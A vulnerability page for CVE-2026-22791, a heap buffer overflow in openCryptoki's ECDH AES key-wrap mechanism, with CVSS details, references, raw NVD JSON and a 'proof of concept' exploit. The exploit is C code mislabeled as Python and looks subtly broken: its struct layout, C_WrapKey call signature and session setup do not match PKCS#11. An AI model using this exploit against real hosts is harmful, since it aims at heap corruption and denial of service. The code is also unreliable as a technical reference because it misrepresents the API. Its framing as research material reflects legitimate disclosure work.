CVE-2026-22791

Description

openCryptoki is a PKCS#11 library and tools for Linux and AIX. In 3.25.0 and 3.26.0, there is a heap buffer overflow vulnerability in the CKM_ECDH_AES_KEY_WRAP implementation allows an attacker with local access to cause out-of-bounds writes in the host process by supplying a compressed EC public key and invoking C_WrapKey. This can lead to heap corruption, or denial-of-service.

CVSS Details

CVSS Score

6.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:opencryptoki_project:opencryptoki:3.25.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:opencryptoki_project:opencryptoki:3.26.0:*:*:*:*:*:*:* - VULNERABLE

openCryptoki 3.25.0

openCryptoki 3.26.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-22791: openCryptoki Heap Buffer Overflow in CKM_ECDH_AES_KEY_WRAP
// This PoC demonstrates triggering the heap overflow via compressed EC public key

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dlfcn.h>

// PKCS#11 types and constants
typedef unsigned char CK_BYTE;
typedef unsigned long CK_ULONG;
typedef void* CK_SESSION_HANDLE;
typedef void* CK_OBJECT_HANDLE;
typedef struct { void* pVoid; CK_ULONG ulLen; } CK_ATTRIBUTE;
typedef CK_ULONG (*CK_C_WrapKey)(void*, CK_ULONG, CK_ATTRIBUTE*, CK_ULONG, CK_BYTE*, CK_ULONG*);
typedef CK_ULONG (*CK_C_OpenSession)(CK_ULONG, CK_ULONG, void*, CK_ULONG, CK_SESSION_HANDLE*);
typedef CK_ULONG (*CK_C_Login)(CK_SESSION_HANDLE, CK_ULONG, CK_BYTE*, CK_ULONG);

#define CKM_ECDH_AES_KEY_WRAP 0x00001071
#define CKM_EC_KEY_PAIR_GEN 0x00001040
#define CKM_AES_KEY_GEN 0x00001081
#define CKO_PRIVATE_KEY 0x00000002
#define CKA_VALUE 0x00000011
#define CKA_EC_PARAMS 0x00000020
#define CKA_EC_POINT 0x00000021

int main() {
    void* hModule = dlopen("libopencryptoki.so.0", RTLD_NOW);
    if (!hModule) {
        fprintf(stderr, "Failed to load openCryptoki library\n");
        return 1;
    }
    
    // Get PKCS#11 function pointers
    CK_C_OpenSession pC_OpenSession = (CK_C_OpenSession)dlsym(hModule, "C_OpenSession");
    CK_C_WrapKey pC_WrapKey = (CK_C_WrapKey)dlsym(hModule, "C_WrapKey");
    
    if (!pC_OpenSession || !pC_WrapKey) {
        fprintf(stderr, "Failed to resolve PKCS#11 functions\n");
        return 1;
    }
    
    // Initialize and open session
    CK_SESSION_HANDLE hSession = 0;
    CK_ULONG ulSlotID = 0;
    pC_OpenSession(ulSlotID, 0, NULL, 0, &hSession);
    
    // Generate EC key pair for wrapping
    CK_OBJECT_HANDLE hPublicKey = 0, hPrivateKey = 0;
    
    // ASN.1 encoded EC parameters for P-256 curve
    unsigned char ec_params[] = {
        0x30, 0x13, 0x06, 0x07, 0x2A, 0x86, 0x48, 0xCE,
        0x3D, 0x02, 0x01, 0x06, 0x08, 0x2A, 0x86, 0x48,
        0xCE, 0x3D, 0x03, 0x01, 0x07
    };
    
    // Malicious compressed EC public key (33 bytes) - triggers overflow
    // First byte 0x02 or 0x03 indicates Y coordinate parity
    unsigned char malicious_pubkey[] = {
        0x02,  // Compressed format indicator + Y parity
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00  // Padding to trigger overflow
    };
    
    // Set up key attributes for target key to be wrapped
    CK_ATTRIBUTE wrapKeyTemplate[] = {
        {CKA_EC_PARAMS, ec_params, sizeof(ec_params)},
        {CKA_EC_POINT, malicious_pubkey, sizeof(malicious_pubkey)}
    };
    
    // Output buffer for wrapped key
    unsigned char wrappedKey[256];
    CK_ULONG pulWrappedKeyLen = sizeof(wrappedKey);
    
    // Trigger the vulnerable C_WrapKey function
    // This will cause heap buffer overflow when processing compressed EC point
    CK_ULONG rv = pC_WrapKey(
        hSession,
        CKM_ECDH_AES_KEY_WRAP,
        wrapKeyTemplate,
        2,
        wrappedKey,
        &pulWrappedKeyLen
    );
    
    if (rv == 0) {
        printf("Key wrapped successfully - overflow may have occurred silently\n");
    } else {
        printf("WrapKey returned: 0x%lx - heap corruption may cause crash\n", rv);
    }
    
    dlclose(hModule);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22791
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22791
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22791/
[4] VulDB https://vuldb.com/cve/CVE-2026-22791
[5] https://github.com/opencryptoki/opencryptoki/commit/785d7577e1477d12fbe235554e7e7b24f2de34b7
[6] https://github.com/opencryptoki/opencryptoki/commit/e37e9127deeeb7bf3c3c4d852c594256c57ec3a8
[7] https://github.com/opencryptoki/opencryptoki/security/advisories/GHSA-26f5-3mwq-4wm7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22791", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:26.710", "lastModified": "2026-02-03T18:47:15.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "openCryptoki is a PKCS#11 library and tools for Linux and AIX. In 3.25.0 and 3.26.0, there is a heap buffer overflow vulnerability in the CKM_ECDH_AES_KEY_WRAP implementation allows an attacker with local access to cause out-of-bounds writes in the host process by supplying a compressed EC public key and invoking C_WrapKey. This can lead to heap corruption, or denial-of-service."}, {"lang": "es", "value": "openCryptoki es una biblioteca PKCS#11 y herramientas para Linux y AIX. En 3.25.0 y 3.26.0, existe una vulnerabilidad de desbordamiento de búfer de pila en la implementación de CKM_ECDH_AES_KEY_WRAP que permite a un atacante con acceso local causar escrituras fuera de límites en el proceso anfitrión al proporcionar una clave pública EC comprimida e invocar C_WrapKey. Esto puede llevar a corrupción de pila o denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-131"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opencryptoki_project:opencryptoki:3.25.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D816F8B-C6E1-47F2-9FE0-546949751FAB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opencryptoki_project:opencryptoki:3.26.0:*:*:*:*:*:*:*", "matchCriteriaId": "A19F0637-CBD9-4902-AFA9-A78584FAACF3"}]}]}], "references": [{"url": "https://github.com/opencryptoki/opencryptoki/commit/785d7577e1477d12fbe235554e7e7b24f2de34b7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opencryptoki/opencryptoki/commit/e37e9127deeeb7bf3c3c4d852c594256c57ec3a8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opencryptoki/opencryptoki/security/advisories/GHSA-26f5-3mwq-4wm7", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}